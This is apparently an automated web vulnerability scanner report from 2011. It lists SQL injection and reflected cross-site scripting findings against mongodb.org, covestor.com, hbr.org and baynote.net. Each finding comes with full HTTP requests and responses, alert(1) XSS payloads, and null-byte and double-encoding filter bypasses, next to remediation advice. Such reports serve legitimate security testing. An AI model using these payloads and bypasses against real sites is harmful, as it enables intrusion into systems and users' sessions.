HTTP/1.1 500 Internal Server Error Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: text/html; charset=UTF-8 Date: Wed, 09 Nov 2011 13:03:31 GMT Connection: close X-xgen-cache: yes X-Cache-Info: not cacheable; response code not cacheable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... org.springframework.dao.DataIntegrityViolationException: Hibernate operation: Could not execute query; SQL []; ERROR: invalid byte sequence for encoding "UTF8": 0x00; nested exception is org.postgresql .util.PSQLException: ERROR: invalid byte sequence for encoding "UTF8": 0x00<br>...[SNIP]...
1.8. http://www.mongodb.org/s/1627/3/3/_/styles/colors.css [spaceKey parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.mongodb.org
Path:
/s/1627/3/3/_/styles/colors.css
Issue detail
The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The database appears to be PostgreSQL. The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /s/1627/3/3/_/styles/colors.css?spaceKey=%00' HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.mongodb.org/s/1627/3/3/_/styles/combined.css Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0; rack.session=BAh7AA%3D%3D%0A; __utma=266042259.1760966378.1320843794.1320843794.1320843794.1; __utmb=266042259.4.10.1320843794; __utmc=266042259; __utmz=266042259.1320843794.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1320843794269-29708; JSESSIONID=BA89C686021CA5448E1370C96EB97C02
Response
HTTP/1.1 500 Internal Server Error Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: text/html; charset=UTF-8 Date: Wed, 09 Nov 2011 13:03:58 GMT Connection: close X-xgen-cache: yes X-Cache-Info: not cacheable; response code not cacheable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... org.springframework.dao.DataIntegrityViolationException: Hibernate operation: Could not execute query; SQL []; ERROR: invalid byte sequence for encoding "UTF8": 0x00; nested exception is org.postgresql .util.PSQLException: ERROR: invalid byte sequence for encoding "UTF8": 0x00<br>...[SNIP]...
1.9. http://www.mongodb.org/s/1627/3/3/_/styles/custom.css [spaceKey parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.mongodb.org
Path:
/s/1627/3/3/_/styles/custom.css
Issue detail
The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The database appears to be PostgreSQL. The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /s/1627/3/3/_/styles/custom.css?spaceKey=%00' HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.mongodb.org/s/1627/3/3/_/styles/combined.css Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0; rack.session=BAh7AA%3D%3D%0A; __utma=266042259.1760966378.1320843794.1320843794.1320843794.1; __utmb=266042259.4.10.1320843794; __utmc=266042259; __utmz=266042259.1320843794.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1320843794269-29708; JSESSIONID=BA89C686021CA5448E1370C96EB97C02
Response
HTTP/1.1 500 Internal Server Error Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: text/html; charset=UTF-8 Date: Wed, 09 Nov 2011 13:03:57 GMT Connection: close X-xgen-cache: yes X-Cache-Info: not cacheable; response code not cacheable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... org.springframework.dao.DataIntegrityViolationException: Hibernate operation: Could not execute query; SQL []; ERROR: invalid byte sequence for encoding "UTF8": 0x00; nested exception is org.postgresql .util.PSQLException: ERROR: invalid byte sequence for encoding "UTF8": 0x00<br>...[SNIP]...
2. Cross-site scripting (reflected)
previous
next
There are 16 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method). The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised. User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
2.1. https://account.covestor.com/mirroring-account/join-trial [email parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://account.covestor.com
Path:
/mirroring-account/join-trial
Issue detail
The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c7f7"><img%20src%3da%20onerror%3dalert(1)>7c872bec941c194f was submitted in the email parameter. This input was echoed as 2c7f7"><img src=a onerror=alert(1)>7c872bec941c194f in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /mirroring-account/join-trial?email=2c7f7"><img%20src%3da%20onerror%3dalert(1)>7c872bec941c194f &emailconfirm=&password=&fname=&lname=&phone=&terms=1&action=1&=Activate+Free+Trial HTTP/1.1 Host: account.covestor.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://account.covestor.com/mirroring-account/join-trial Cookie: COVESTOR_AFF=%255BUS%255D%26%26%26%26http%253A%252F%252Fcovestor%252Ecom%252F; __utma=100923155.1926746815.1320845508.1320845508.1320845508.1; __utmb=100923155.1.10.1320845508; __utmc=100923155; __utmz=100923155.1320845508.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; C1320846063250=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial
Response
HTTP/1.1 200 OK Date: Wed, 09 Nov 2011 13:45:11 GMT Server: COVESTOR Set-Cookie: COVESTOR=;domain=.covestor.com;Secure;expires=Tue, 09-Nov-2010 13:45:11 GMT;path=/ Set-Cookie: C1320846311874=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial%3Femail%3D2c7f7%22%3E%3Cimg%2520src%253da%2520onerror%253dalert%281%29%3E7c872bec941c194f%26emailconfirm%3D%26password%3D%26fname%3D%26lname%3D%26phone%3D%26terms%3D1%26action%3D1%26%3DActivate%2BFree%2BTrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:50:10 GMT;path=/ Expires: Wed, 09 Nov 2011 13:45:11 GMT Vary: Accept-Encoding Keep-Alive: timeout=15, max=56 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 24824 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!-- start head:me...[SNIP]... <input type="text" id="trial-email" name="email" value="2c7f7"><img src=a onerror=alert(1)>7c872bec941c194f " />...[SNIP]...
2.2. https://account.covestor.com/mirroring-account/join-trial [emailconfirm parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://account.covestor.com
Path:
/mirroring-account/join-trial
Issue detail
The value of the emailconfirm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3472"><img%20src%3da%20onerror%3dalert(1)>a202322a5c425c4d5 was submitted in the emailconfirm parameter. This input was echoed as c3472"><img src=a onerror=alert(1)>a202322a5c425c4d5 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /mirroring-account/join-trial?email=&emailconfirm=c3472"><img%20src%3da%20onerror%3dalert(1)>a202322a5c425c4d5 &password=&fname=&lname=&phone=&terms=1&action=1&=Activate+Free+Trial HTTP/1.1 Host: account.covestor.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://account.covestor.com/mirroring-account/join-trial Cookie: COVESTOR_AFF=%255BUS%255D%26%26%26%26http%253A%252F%252Fcovestor%252Ecom%252F; __utma=100923155.1926746815.1320845508.1320845508.1320845508.1; __utmb=100923155.1.10.1320845508; __utmc=100923155; __utmz=100923155.1320845508.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; C1320846063250=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial
Response
HTTP/1.1 200 OK Date: Wed, 09 Nov 2011 13:45:20 GMT Server: COVESTOR Set-Cookie: COVESTOR=;domain=.covestor.com;Secure;expires=Tue, 09-Nov-2010 13:45:20 GMT;path=/ Set-Cookie: C1320846320696=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial%3Femail%3D%26emailconfirm%3Dc3472%22%3E%3Cimg%2520src%253da%2520onerror%253dalert%281%29%3Ea202322a5c425c4d5%26password%3D%26fname%3D%26lname%3D%26phone%3D%26terms%3D1%26action%3D1%26%3DActivate%2BFree%2BTrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:50:19 GMT;path=/ Expires: Wed, 09 Nov 2011 13:45:20 GMT Vary: Accept-Encoding Keep-Alive: timeout=15, max=44 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 24825 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!-- start head:me...[SNIP]... <input type="text" id="trial-conf" name="emailconfirm" value="c3472"><img src=a onerror=alert(1)>a202322a5c425c4d5 " />...[SNIP]...
2.3. https://account.covestor.com/mirroring-account/join-trial [fname parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://account.covestor.com
Path:
/mirroring-account/join-trial
Issue detail
The value of the fname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 949fc"><img%20src%3da%20onerror%3dalert(1)>ee1a89c396957db8c was submitted in the fname parameter. This input was echoed as 949fc"><img src=a onerror=alert(1)>ee1a89c396957db8c in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /mirroring-account/join-trial?email=&emailconfirm=&password=&fname=949fc"><img%20src%3da%20onerror%3dalert(1)>ee1a89c396957db8c &lname=&phone=&terms=1&action=1&=Activate+Free+Trial HTTP/1.1 Host: account.covestor.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://account.covestor.com/mirroring-account/join-trial Cookie: COVESTOR_AFF=%255BUS%255D%26%26%26%26http%253A%252F%252Fcovestor%252Ecom%252F; __utma=100923155.1926746815.1320845508.1320845508.1320845508.1; __utmb=100923155.1.10.1320845508; __utmc=100923155; __utmz=100923155.1320845508.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; C1320846063250=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial
Response
HTTP/1.1 200 OK Date: Wed, 09 Nov 2011 13:45:32 GMT Server: COVESTOR Set-Cookie: COVESTOR=;domain=.covestor.com;Secure;expires=Tue, 09-Nov-2010 13:45:32 GMT;path=/ Set-Cookie: C1320846332394=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial%3Femail%3D%26emailconfirm%3D%26password%3D%26fname%3D949fc%22%3E%3Cimg%2520src%253da%2520onerror%253dalert%281%29%3Eee1a89c396957db8c%26lname%3D%26phone%3D%26terms%3D1%26action%3D1%26%3DActivate%2BFree%2BTrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:50:31 GMT;path=/ Expires: Wed, 09 Nov 2011 13:45:32 GMT Vary: Accept-Encoding Keep-Alive: timeout=15, max=86 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 24822 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!-- start head:me...[SNIP]... <input type="text" id="trial-fname" name="fname" value="949fc"><img src=a onerror=alert(1)>ee1a89c396957db8c " />...[SNIP]...
2.4. https://account.covestor.com/mirroring-account/join-trial [lname parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://account.covestor.com
Path:
/mirroring-account/join-trial
Issue detail
The value of the lname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd6cf"><img%20src%3da%20onerror%3dalert(1)>1701d5e91ffac6f2b was submitted in the lname parameter. This input was echoed as cd6cf"><img src=a onerror=alert(1)>1701d5e91ffac6f2b in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /mirroring-account/join-trial?email=&emailconfirm=&password=&fname=&lname=cd6cf"><img%20src%3da%20onerror%3dalert(1)>1701d5e91ffac6f2b &phone=&terms=1&action=1&=Activate+Free+Trial HTTP/1.1 Host: account.covestor.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://account.covestor.com/mirroring-account/join-trial Cookie: COVESTOR_AFF=%255BUS%255D%26%26%26%26http%253A%252F%252Fcovestor%252Ecom%252F; __utma=100923155.1926746815.1320845508.1320845508.1320845508.1; __utmb=100923155.1.10.1320845508; __utmc=100923155; __utmz=100923155.1320845508.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; C1320846063250=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial
Response
HTTP/1.1 200 OK Date: Wed, 09 Nov 2011 13:45:41 GMT Server: COVESTOR Set-Cookie: COVESTOR=;domain=.covestor.com;Secure;expires=Tue, 09-Nov-2010 13:45:41 GMT;path=/ Set-Cookie: C1320846341266=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial%3Femail%3D%26emailconfirm%3D%26password%3D%26fname%3D%26lname%3Dcd6cf%22%3E%3Cimg%2520src%253da%2520onerror%253dalert%281%29%3E1701d5e91ffac6f2b%26phone%3D%26terms%3D1%26action%3D1%26%3DActivate%2BFree%2BTrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:50:40 GMT;path=/ Expires: Wed, 09 Nov 2011 13:45:41 GMT Vary: Accept-Encoding Keep-Alive: timeout=15, max=54 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 24822 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!-- start head:me...[SNIP]... <input type="text" id="trial-lname" name="lname" value="cd6cf"><img src=a onerror=alert(1)>1701d5e91ffac6f2b " />...[SNIP]...
2.5. https://account.covestor.com/mirroring-account/join-trial [phone parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://account.covestor.com
Path:
/mirroring-account/join-trial
Issue detail
The value of the phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 824f1"><img%20src%3da%20onerror%3dalert(1)>b19090bd4aadf0e5a was submitted in the phone parameter. This input was echoed as 824f1"><img src=a onerror=alert(1)>b19090bd4aadf0e5a in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /mirroring-account/join-trial?email=&emailconfirm=&password=&fname=&lname=&phone=824f1"><img%20src%3da%20onerror%3dalert(1)>b19090bd4aadf0e5a &terms=1&action=1&=Activate+Free+Trial HTTP/1.1 Host: account.covestor.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://account.covestor.com/mirroring-account/join-trial Cookie: COVESTOR_AFF=%255BUS%255D%26%26%26%26http%253A%252F%252Fcovestor%252Ecom%252F; __utma=100923155.1926746815.1320845508.1320845508.1320845508.1; __utmb=100923155.1.10.1320845508; __utmc=100923155; __utmz=100923155.1320845508.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; C1320846063250=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial
Response
HTTP/1.1 200 OK Date: Wed, 09 Nov 2011 13:45:50 GMT Server: COVESTOR Set-Cookie: COVESTOR=;domain=.covestor.com;Secure;expires=Tue, 09-Nov-2010 13:45:50 GMT;path=/ Set-Cookie: C1320846350062=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial%3Femail%3D%26emailconfirm%3D%26password%3D%26fname%3D%26lname%3D%26phone%3D824f1%22%3E%3Cimg%2520src%253da%2520onerror%253dalert%281%29%3Eb19090bd4aadf0e5a%26terms%3D1%26action%3D1%26%3DActivate%2BFree%2BTrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:50:49 GMT;path=/ Expires: Wed, 09 Nov 2011 13:45:50 GMT Vary: Accept-Encoding Keep-Alive: timeout=15, max=63 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 24945 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!-- start head:me...[SNIP]... <input type="text" id="trial-tel" name="phone" value="824f1"><img src=a onerror=alert(1)>b19090bd4aadf0e5a " />...[SNIP]...
2.6. http://harvardbusinessreview-www.baynote.net/baynote/tags3/guide/results2/harvardbusinessreview-www [elementIds parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://harvardbusinessreview-www.baynote.net
Path:
/baynote/tags3/guide/results2/harvardbusinessreview-www
Issue detail
The value of the elementIds request parameter is copied into the HTML document as plain text between tags. The payload %00b0431<script>alert(1)</script>ebdb48d8df9 was submitted in the elementIds parameter. This input was echoed as b0431<script>alert(1)</script>ebdb48d8df9 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /baynote/tags3/guide/results2/harvardbusinessreview-www?userId=ANONYMOUS&customerId=harvardbusinessreview&code=www&id=1&referrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&url=http%3A%2F%2Fhbr.org%2Fproduct%2Fhow-venture-capitalists-evaluate-potential-venture%2Fan%2F805019-PDF-ENG%3FNtt%3DVenture%2BCapital%2Bprocess%26Nao%3D10&appendParams=&rankParam=&condition=d%26g%26s&elementIds=bnCustomersWhoViewed%00b0431<script>alert(1)</script>ebdb48d8df9 &v=1 HTTP/1.1 Host: harvardbusinessreview-www.baynote.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10
Response
HTTP/1.1 200 OK Server: BNServer Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/javascript;charset=ISO-8859-1 Content-Length: 154 Date: Wed, 09 Nov 2011 14:09:52 GMT bnTagManager.getTag(1).divId = "bnCustomersWhoViewed.b0431<script>alert(1)</script>ebdb48d8df9 "; bnResourceManager.registerResource("GLResults1");
2.7. http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG [Nao parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://hbr.org
Path:
/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG
Issue detail
The value of the Nao request parameter is copied into an HTML comment. The payload f5175--><script>alert(1)</script>f312a248b4f was submitted in the Nao parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10f5175--><script>alert(1)</script>f312a248b4f HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.navfund.com/resources
Response
HTTP/1.1 200 OK Set-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:11:17 GMT X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5 X-Powered-By: JSF/1.2 Set-Cookie: HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; Domain=hbr.org; Expires=Sat, 24-Dec-2011 14:11:17 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Expires: Wed, 09 Nov 2011 14:11:17 GMT LEG: 5 Vary: Accept-Encoding Content-Length: 47634 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <hea...[SNIP]... <a href="/shopping-cart/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10f5175--><script>alert(1)</script>f312a248b4f ">...[SNIP]...
2.8. http://hbr.org/service/restv1/most-popular/daily/most_hbr/10/mostResphdlr [REST URL parameter 7]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://hbr.org
Path:
/service/restv1/most-popular/daily/most_hbr/10/mostResphdlr
Issue detail
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload a97fd%253cscript%253ealert%25281%2529%253c%252fscript%253e7555d97a7c3 was submitted in the REST URL parameter 7. This input was echoed as a97fd<script>alert(1)</script>7555d97a7c3 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
